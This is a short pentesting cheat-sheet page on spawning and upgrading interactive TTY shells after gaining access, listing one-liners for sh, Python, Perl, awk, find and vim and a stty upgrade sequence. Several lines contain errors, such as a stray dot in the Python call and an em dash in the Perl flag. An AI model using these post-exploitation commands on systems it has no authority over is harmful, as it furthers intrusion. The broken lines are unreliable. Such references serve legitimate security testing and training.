Spawning a TTY Shell

Spawning TTY Shells

/bin/sh -i

/usr/bin/script -qc /bin/bash /dev/null

echo os.system('/bin/bash')

# Python
python3 -c 'import pty;pty.spawn.("/bin/bash");'

# Perl
perl —e 'exec "/bin/sh";'
perl: exec "/bin/sh"; # it should be run from a script

# Ruby
ruby: exec "/bin/sh" # it should be run from a script

# Lua
lua: os.execute('/bin/sh') # it should be run from a script

# AWK
awk 'BEGIN {system("/bin/sh")}'

# Find
find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \\;
find . -exec /bin/sh \\; -quit

# Vim
vim -c ':!/bin/sh'

# Vim Escape
vim
:set shell=/bin/sh
:shell

Upgrading TTY Shells

# After getting a shell and spawing tty shell using one of the above methods, follow below step

# Hit ctrl[z]
^Z
# run below commands
stty raw -echo
fg
# If it shows blamk screen, press enter or input reset command to get the shell prompt
[Enter]
[Enter]
www-data@remotehost$

# To use full screen 
# In New Tab, note the output of both 
echo $TERM
stty size

# On our nc Shell on target
export TERM=xterm-256color
stty rows 67 columns 318

PreviousBind Shells NextWeb Shells

Last updated 3 years ago